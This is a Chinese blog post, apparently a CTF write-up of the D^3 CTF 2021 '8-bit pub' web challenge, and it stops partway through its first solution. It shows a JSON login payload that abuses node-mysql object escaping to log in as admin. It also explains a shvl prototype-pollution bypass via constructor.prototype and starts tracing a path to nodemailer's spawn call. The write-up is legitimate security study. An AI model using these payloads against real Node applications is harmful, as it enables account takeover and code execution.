

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="s4mmy">
  <meta name="keywords" content="">
  
    <meta name="description" content="D^3 CTF 2021 8-bit pub复现这题是顺着群里师傅的链接摸到的，前前后后总共拖了三天才完成。。。。拖延症太难受了 github题目仓库：CTFChallenges&#x2F;D3CTF2021&#x2F;8-bit_pub at main · crumbledwall&#x2F;CTFChallenges (github.com) 根据师傅所说比赛的时候是给了源码的，所以我们先从源">
<meta property="og:type" content="article">
<meta property="og:title" content="D^3 CTF 2021 8-bit pub复现">
<meta property="og:url" content="https://sammylingsj.github.io/2023/06/28/D^3%20CTF%202021%208-bit%20pub%E5%A4%8D%E7%8E%B0/D^3%20CTF%202021%208-bit%20pub%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="s4mmy&#39;s blog">
<meta property="og:description" content="D^3 CTF 2021 8-bit pub复现这题是顺着群里师傅的链接摸到的，前前后后总共拖了三天才完成。。。。拖延症太难受了 github题目仓库：CTFChallenges&#x2F;D3CTF2021&#x2F;8-bit_pub at main · crumbledwall&#x2F;CTFChallenges (github.com) 根据师傅所说比赛的时候是给了源码的，所以我们先从源">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://sammylingsj.github.io/img/8-bit%20pub-images/1.png">
<meta property="og:image" content="https://sammylingsj.github.io/img/8-bit%20pub-images/2.png">
<meta property="og:image" content="https://sammylingsj.github.io/img/8-bit%20pub-images/3.png">
<meta property="og:image" content="https://sammylingsj.github.io/img/8-bit%20pub-images/4.png">
<meta property="og:image" content="https://sammylingsj.github.io/img/8-bit%20pub-images/6.png">
<meta property="og:image" content="https://sammylingsj.github.io/img/8-bit%20pub-images/5.png">
<meta property="article:published_time" content="2023-06-28T13:08:13.489Z">
<meta property="article:modified_time" content="2023-06-28T14:15:17.397Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://sammylingsj.github.io/img/8-bit%20pub-images/1.png">
  
  
  
  <title>D^3 CTF 2021 8-bit pub复现 - s4mmy&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"sammylingsj.github.io","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>s4mmy&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/index.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="D^3 CTF 2021 8-bit pub复现"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-06-28 21:08" pubdate>
          2023年6月28日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          9.1k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          76 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">D^3 CTF 2021 8-bit pub复现</h1>
            
            
              <div class="markdown-body">
                
                <h3 id="D-3-CTF-2021-8-bit-pub复现"><a href="#D-3-CTF-2021-8-bit-pub复现" class="headerlink" title="D^3 CTF 2021 8-bit pub复现"></a>D^3 CTF 2021 8-bit pub复现</h3><p>这题是顺着群里师傅的链接摸到的，前前后后总共拖了三天才完成。。。。拖延症太难受了</p>
<p>github题目仓库：<a target="_blank" rel="noopener" href="https://github.com/crumbledwall/CTFChallenges/tree/main/D3CTF2021/8-bit_pub">CTFChallenges&#x2F;D3CTF2021&#x2F;8-bit_pub at main · crumbledwall&#x2F;CTFChallenges (github.com)</a></p>
<p>根据师傅所说比赛的时候是给了源码的，所以我们先从源码入手，github上直接拖下来的题目文件是给docker用的，这里要先输入<code>npm install</code>补全一些依赖库，到时候审计的时候用得上。</p>
<p><img src="/../../img/8-bit%20pub-images/1.png" srcset="/img/loading.gif" lazyload></p>
<p>首先尝试注册登录，然而并没有什么卵用，题目需要你拿到admin的账号</p>
<p>在<code>route/index.js</code>处可以看到各个功能的路由，查看注册和登录的源码文件。</p>
<p>可以看到如下代码</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs javascript"> sql.<span class="hljs-title function_">query</span>(<br>      <span class="hljs-string">&quot;SELECT * FROM users WHERE username = ? AND password = ?&quot;</span>,<br>      [username, password],<br>      <span class="hljs-keyword">function</span> (<span class="hljs-params">err, res</span>) &#123;<br>        <span class="hljs-keyword">if</span> (err) &#123;<br>          <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&quot;error: &quot;</span>, err);<br>          <span class="hljs-keyword">return</span> <span class="hljs-title function_">done</span>(err, <span class="hljs-literal">null</span>);<br>        &#125; <span class="hljs-keyword">else</span> &#123;<br>          <span class="hljs-keyword">return</span> <span class="hljs-title function_">done</span>(<span class="hljs-literal">null</span>, res);<br>        &#125;<br>      &#125;<br>    );<br>  &#125;,<br>&#125;;<br><br> <span class="hljs-attr">signup</span>: <span class="hljs-keyword">function</span> (<span class="hljs-params">username, password, done</span>) &#123;<br>    sql.<span class="hljs-title function_">query</span>(<br>      <span class="hljs-string">&quot;SELECT * FROM users WHERE username = ?&quot;</span>,<br>      [username],<br>      <span class="hljs-keyword">function</span> (<span class="hljs-params">err, res</span>) &#123;<br>.......<br></code></pre></td></tr></table></figure>

<p>这里的sql语句使用了占位符，会对传进来的参数进行转义，所以没办法进行sql注入。</p>
<p>但是在node-mysql文档的末尾有这么一段话</p>
<blockquote>
<p><strong>注意：</strong>与预处理语句不同的是，<code>?</code>就算出现在注释或字符串里，也会被替换成对应的值。</p>
<p>不同类型的值会按不同的规则进行转义，规则如下：</p>
<ul>
<li>数字保持不变</li>
<li>布尔值会被转换为<code>true</code>&#x2F;<code>false</code></li>
<li>日期对象转换为<code>&#39;YYYY-mm-dd HH:ii:ss&#39;</code>字符串</li>
<li>Buffer对象会被转换为十六进制字符串，例如<code>X&#39;0fa5&#39;</code></li>
<li>字符串会被安全转义</li>
<li>数组会被转换为列表，例如<code>[&#39;a&#39;, &#39;b&#39;]</code>会被转换为<code>&#39;a&#39;, &#39;b&#39;</code></li>
<li>嵌套数组会被转换为分组列表(用于批量插入)，例如<code>[[&#39;a&#39;, &#39;b&#39;], [&#39;c&#39;, &#39;d&#39;]]</code>会被转换为<code>(&#39;a&#39;, &#39;b&#39;), (&#39;c&#39;, &#39;d&#39;)</code></li>
<li>具有<code>toSqlString</code>方法的对象会调用<code>.toSqlString()</code>，并将返回的值作为初始SQL。</li>
<li>对象上的可枚举属性会被转换为<code>key = &#39;val&#39;</code>键值对。如果属性值是一个函数，该属性会被忽略。如果属性值是对象，会对其调用toString()并将返回的值作为val。</li>
<li><code>undefined</code>&#x2F;<code>null</code>会转换为<code>NULL</code></li>
<li><code>NaN</code>&#x2F;<code>Infinity</code>保持不变。 MySQL目前并不支持。如果你强行插入这类值，将触发MySQL错误。</li>
</ul>
</blockquote>
<p>这里是利用了传入对象会被转换为`key`&#x3D;val的键值对的这个特性</p>
<p>所以这里的操作是要传入一个对象，使用的是json格式的数据</p>
<p>在后面嵌套两个password的原因是就是传入一个对象。</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs json"><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;username&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-string">&quot;admin&quot;</span><span class="hljs-punctuation">,</span><span class="hljs-attr">&quot;password&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-punctuation">&#123;</span><span class="hljs-attr">&quot;password&quot;</span><span class="hljs-punctuation">:</span><span class="hljs-literal"><span class="hljs-keyword">true</span></span><span class="hljs-punctuation">&#125;</span><span class="hljs-punctuation">&#125;</span><br></code></pre></td></tr></table></figure>

<p>这样后台的查询语句是这样的,相当于构造了一个万能密码，SQL语句中逻辑运算符具有优先级，【&#x3D;】优先于【and】,【and】优先于【or】</p>
<p>sql查询语句如下</p>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-attr">username</span> = <span class="hljs-string">&#x27;admin&#x27;</span> AND password = `password` = <span class="hljs-literal">true</span><br></code></pre></td></tr></table></figure>

<p>在这里我本来有个疑惑，就是在传入对象的时候为什么不能再<code>username</code>那里也传入一组对象比如</p>
<figure class="highlight clojure"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs clojure">&#123;<span class="hljs-string">&quot;username&quot;</span>:&#123;<span class="hljs-string">&quot;username&quot;</span><span class="hljs-symbol">:admin</span>&#125;<span class="hljs-punctuation">,</span><span class="hljs-string">&quot;password&quot;</span>:&#123;<span class="hljs-string">&quot;password&quot;</span><span class="hljs-symbol">:true</span>&#125;&#125;<br></code></pre></td></tr></table></figure>

<p>但是经过尝试发现这样穿的话是不行的。后来问了其他师傅，在注册时传入上述的数据，然后进入数据库里面看了一下，发现如果传入的是对象的话解析之后传到数据库的内容都是NULL或者0，这样的话这句万能密码的sql语句就不能成立。</p>
<p><img src="/../../img/8-bit%20pub-images/2.png" srcset="/img/loading.gif" lazyload></p>
<p>成功登陆之后我们可以直接跳转到admin页面</p>
<p><img src="/../../img/8-bit%20pub-images/3.png" srcset="/img/loading.gif" lazyload></p>
<p>最早看到sql注入占位符的时候我以为是预编译，没办法注入（当然占位符也不能注入:（  ），所以我放弃了sql注入的想法，所以在这一步我原先的想法是去伪造session绕过身份验证去，因为我在通往admin的路由上看到还调用了auth.js</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-keyword">let</span> auth = <span class="hljs-keyword">function</span> (<span class="hljs-params">req, res, next</span>) &#123;<br>  <span class="hljs-keyword">if</span> (!req.<span class="hljs-property">session</span>.<span class="hljs-property">username</span>) &#123;<br>    <span class="hljs-keyword">return</span> res.<span class="hljs-title function_">redirect</span>(<span class="hljs-number">302</span>, <span class="hljs-string">&quot;/&quot;</span>);<br>  &#125;<br>  <span class="hljs-keyword">if</span> (req.<span class="hljs-property">session</span>.<span class="hljs-property">username</span> !== <span class="hljs-string">&quot;admin&quot;</span>) &#123;<br>    <span class="hljs-keyword">if</span> (req.<span class="hljs-property">method</span> === <span class="hljs-string">&quot;GET&quot;</span>) &#123;<br>      <span class="hljs-keyword">return</span> res.<span class="hljs-title function_">sendView</span>(<span class="hljs-string">&quot;forbidden.html&quot;</span>);<br>    &#125; <span class="hljs-keyword">else</span> &#123;<br>      <span class="hljs-keyword">return</span> res.<span class="hljs-title function_">json</span>(&#123; <span class="hljs-attr">message</span>: <span class="hljs-string">&quot;Forbidden.&quot;</span> &#125;);<br>    &#125;<br>  &#125;<br>  <span class="hljs-title function_">next</span>();<br>&#125;;<br><br><span class="hljs-variable language_">module</span>.<span class="hljs-property">exports</span> = auth;<br></code></pre></td></tr></table></figure>

<p>这边验证的是<code>session.username</code>而<code>session.username</code>是从这里获得的</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-attr">signin</span>: <span class="hljs-keyword">function</span> (<span class="hljs-params">req, res</span>) &#123;<br>  user.<span class="hljs-title function_">signin</span>(req.<span class="hljs-property">body</span>.<span class="hljs-property">username</span>, req.<span class="hljs-property">body</span>.<span class="hljs-property">password</span>, <span class="hljs-keyword">function</span> (<span class="hljs-params">err, result</span>) &#123;<br>    <span class="hljs-keyword">if</span> (err) &#123;<br>      <span class="hljs-keyword">return</span> res.<span class="hljs-title function_">status</span>(<span class="hljs-number">500</span>).<span class="hljs-title function_">json</span>(&#123; <span class="hljs-attr">message</span>: err.<span class="hljs-property">message</span> &#125;);<br>    &#125;<br>    <span class="hljs-keyword">if</span> (result.<span class="hljs-property">length</span>) &#123;<br>      <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(req.<span class="hljs-property">session</span>)<br>      req.<span class="hljs-property">session</span>.<span class="hljs-property">username</span> = result[<span class="hljs-number">0</span>].<span class="hljs-property">username</span>;<br>      <span class="hljs-keyword">return</span> res.<span class="hljs-title function_">json</span>(&#123; <span class="hljs-attr">message</span>: <span class="hljs-string">&quot;Signin success.&quot;</span> &#125;);<br>    &#125; <span class="hljs-keyword">else</span> &#123;<br>      <span class="hljs-keyword">return</span> res.<span class="hljs-title function_">status</span>(<span class="hljs-number">401</span>).<span class="hljs-title function_">json</span>(&#123; <span class="hljs-attr">message</span>: <span class="hljs-string">&quot;Username or password wrong.&quot;</span> &#125;);<br>    &#125;<br>  &#125;);<br>&#125;,<br></code></pre></td></tr></table></figure>

<p>这里调用的user.signig()函数如下</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-attr">signin</span>: <span class="hljs-keyword">function</span> (<span class="hljs-params">username, password, done</span>) &#123;<br>    sql.<span class="hljs-title function_">query</span>(<br>      <span class="hljs-string">&quot;SELECT * FROM users WHERE username = ? AND password = ?&quot;</span>,<br>      [username, password],<br>      <span class="hljs-keyword">function</span> (<span class="hljs-params">err, res</span>) &#123;<br>        <span class="hljs-keyword">if</span> (err) &#123;<br>          <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&quot;error: &quot;</span>, err);<br>          <span class="hljs-keyword">return</span> <span class="hljs-title function_">done</span>(err, <span class="hljs-literal">null</span>);<br>        &#125; <span class="hljs-keyword">else</span> &#123;<br>          <span class="hljs-keyword">return</span> <span class="hljs-title function_">done</span>(<span class="hljs-literal">null</span>, res);<br>        &#125;<br>      &#125;<br>    );<br>  &#125;,<br>&#125;;<br></code></pre></td></tr></table></figure>

<p>所以可以得到<code>result[0].username</code>的值即为<code>session.username</code></p>
<p>因为这题的环境是用docker搭的，没办法直接用vscode调试，所以这里的<code>result</code>的值没办法知道是什么，但猜测是数据库查询返回的结果，其中username是列名，所以我们应该是没办法伪造session的。。:(</p>
<h4 id="方法一"><a href="#方法一" class="headerlink" title="方法一"></a>方法一</h4><p>登陆成功后跳转到admin页面，看样子像一个发送邮件的页面。开始代码审计！</p>
<p>首先根据路由来到<code>adminController.js</code>的<code>email</code>方法，乍一看好像没有什么利用点。。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs javascript">  <span class="hljs-attr">email</span>: <span class="hljs-keyword">async</span> <span class="hljs-keyword">function</span> (<span class="hljs-params">req, res</span>) &#123;<br>    <span class="hljs-keyword">let</span> contents = &#123;&#125;;<br><br>    <span class="hljs-title class_">Object</span>.<span class="hljs-title function_">keys</span>(req.<span class="hljs-property">body</span>).<span class="hljs-title function_">forEach</span>(<span class="hljs-function">(<span class="hljs-params">key</span>) =&gt;</span> &#123;<br>      shvl.<span class="hljs-title function_">set</span>(contents, key, req.<span class="hljs-property">body</span>[key]);<br>    &#125;);<br><br>    contents.<span class="hljs-property">from</span> = <span class="hljs-string">&#x27;&quot;admin&quot; 2449970596@qq.com&#x27;</span>;<br><br>    <span class="hljs-keyword">try</span> &#123;<br>      <span class="hljs-keyword">await</span> <span class="hljs-title function_">send</span>(contents);<br>      <span class="hljs-keyword">return</span> res.<span class="hljs-title function_">json</span>(&#123;<span class="hljs-attr">message</span>: <span class="hljs-string">&quot;Success.&quot;</span>&#125;);<br>    &#125; <span class="hljs-keyword">catch</span> (err) &#123;<br>      <span class="hljs-keyword">return</span> res.<span class="hljs-title function_">status</span>(<span class="hljs-number">500</span>).<span class="hljs-title function_">json</span>(&#123; <span class="hljs-attr">message</span>: err.<span class="hljs-property">message</span> &#125;);<br>    &#125;<br>  &#125;,<br>&#125;;<br></code></pre></td></tr></table></figure>

<p>这里有一个细节就是引入了shvl库（当时第一次审代码的时候完全没有放在心上，只是觉得有点奇怪而已，以后要多留意这些被引入的库）。</p>
<p>其中在发信前调用了<code>shvl.set</code>方法，我们根据路径查找到<code>/node_modules/shvl/index&quot;</code>发现如下代码</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-keyword">export</span> <span class="hljs-keyword">function</span> <span class="hljs-title function_">set</span>  (object, path, val, obj) &#123;<br>  <span class="hljs-keyword">return</span> !<span class="hljs-regexp">/^(__proto__|constructor|prototype)$/</span>.<span class="hljs-title function_">test</span>(path) &amp;&amp; ((path = path.<span class="hljs-property">split</span> ? path.<span class="hljs-title function_">split</span>(<span class="hljs-string">&#x27;.&#x27;</span>) : path.<span class="hljs-title function_">slice</span>(<span class="hljs-number">0</span>)).<span class="hljs-title function_">slice</span>(<span class="hljs-number">0</span>, -<span class="hljs-number">1</span>).<span class="hljs-title function_">reduce</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params">obj, p</span>) &#123;<br>    <span class="hljs-keyword">return</span> obj[p] = obj[p] || &#123;&#125;;<br>  &#125;, obj = object)[path.<span class="hljs-title function_">pop</span>()] = val), object;<br>&#125;;<br></code></pre></td></tr></table></figure>

<p>看样子有点像合并函数，但是ban了可以用来原型链污染的所有关键字，所以无法利用。</p>
<p>其实这里出了点问题，我看网上师傅们的wp上的源码都是只有过滤<code>__proto__</code>而我手上的源码全过滤了，但是在实际测试中发现使用<code>constructor.prototype</code>又能绕过，orz.</p>
<p>检查package.json里的shvl版本也是2.02，在github上也能看到到了2.03版本的修复中才加上了<code>constructor</code>和<code>prototype</code>。</p>
<p><img src="/../../img/8-bit%20pub-images/4.png" srcset="/img/loading.gif" lazyload></p>
<p>这里就当做只过滤<code>__proto__</code>来进行审计吧</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-keyword">export</span> <span class="hljs-keyword">function</span> <span class="hljs-title function_">set</span>  (object, path, val, obj) &#123;<br>  <span class="hljs-keyword">return</span> !<span class="hljs-regexp">/^(__proto__)$/</span>.<span class="hljs-title function_">test</span>(path) &amp;&amp; ((path = path.<span class="hljs-property">split</span> ? path.<span class="hljs-title function_">split</span>(<span class="hljs-string">&#x27;.&#x27;</span>) : path.<span class="hljs-title function_">slice</span>(<span class="hljs-number">0</span>)).<span class="hljs-title function_">slice</span>(<span class="hljs-number">0</span>, -<span class="hljs-number">1</span>).<span class="hljs-title function_">reduce</span>(<span class="hljs-keyword">function</span> (<span class="hljs-params">obj, p</span>) &#123;<br>    <span class="hljs-keyword">return</span> obj[p] = obj[p] || &#123;&#125;;<br>  &#125;, obj = object)[path.<span class="hljs-title function_">pop</span>()] = val), object;<br>&#125;;<br></code></pre></td></tr></table></figure>

<p><strong>这里又get了一个审计小技巧，对于这种在github上开源且有release更新的话可以直接去查看修改了哪些代码，直接定位历史漏洞。</strong></p>
<p>首先实现使用test进行正则判断，path的参数内是否含有<code>__proto__</code>，所以可以判断这里存在原型链污染漏洞且使用<code>constructor.prototype</code>绕过。（虽然不是很懂后半部分代码的具体含义。。。）</p>
<p>找到原型链污染的地方后就要寻找利用点了。</p>
<p>这里有两种寻找利用点的方法</p>
<p>第一种</p>
<p>在vscode全局搜索RCE利用点，例如<code>child_process</code>，可以在<code>node_modules\nodemailer\lib\sendmail-transport\index.js</code>里找到如下代码</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-keyword">const</span> spawn = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;child_process&#x27;</span>).<span class="hljs-property">spawn</span>;<br><span class="hljs-keyword">const</span> packageData = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;../../package.json&#x27;</span>);<br><span class="hljs-keyword">const</span> shared = <span class="hljs-built_in">require</span>(<span class="hljs-string">&#x27;../shared&#x27;</span>);<br>.....<br><span class="hljs-keyword">class</span> <span class="hljs-title class_">SendmailTransport</span> &#123;<br>    <span class="hljs-title function_">constructor</span>(<span class="hljs-params">options</span>) &#123;<br>        options = options || &#123;&#125;;<br><br>        <span class="hljs-comment">// use a reference to spawn for mocking purposes</span><br>        <span class="hljs-variable language_">this</span>.<span class="hljs-property">_spawn</span> = spawn;<br><br>        <span class="hljs-variable language_">this</span>.<span class="hljs-property">options</span> = options || &#123;&#125;;<br>......<br></code></pre></td></tr></table></figure>

<p>继续跟进查看</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-keyword">try</span> &#123;<br>           sendmail = <span class="hljs-variable language_">this</span>.<span class="hljs-title function_">_spawn</span>(<span class="hljs-variable language_">this</span>.<span class="hljs-property">path</span>, args);<br>       &#125; <span class="hljs-keyword">catch</span> (E) &#123;<br>           <span class="hljs-variable language_">this</span>.<span class="hljs-property">logger</span>.<span class="hljs-title function_">error</span>(<br>               &#123;<br>                   <span class="hljs-attr">err</span>: E,<br>                   <span class="hljs-attr">tnx</span>: <span class="hljs-string">&#x27;spawn&#x27;</span>,<br>                   messageId<br>               &#125;,<br>               <span class="hljs-string">&#x27;Error occurred while spawning sendmail. %s&#x27;</span>,<br>               E.<span class="hljs-property">message</span><br>           );<br>           <span class="hljs-keyword">return</span> <span class="hljs-title function_">callback</span>(E);<br>       &#125;<br></code></pre></td></tr></table></figure>

<p>跟进<code>this.path</code></p>
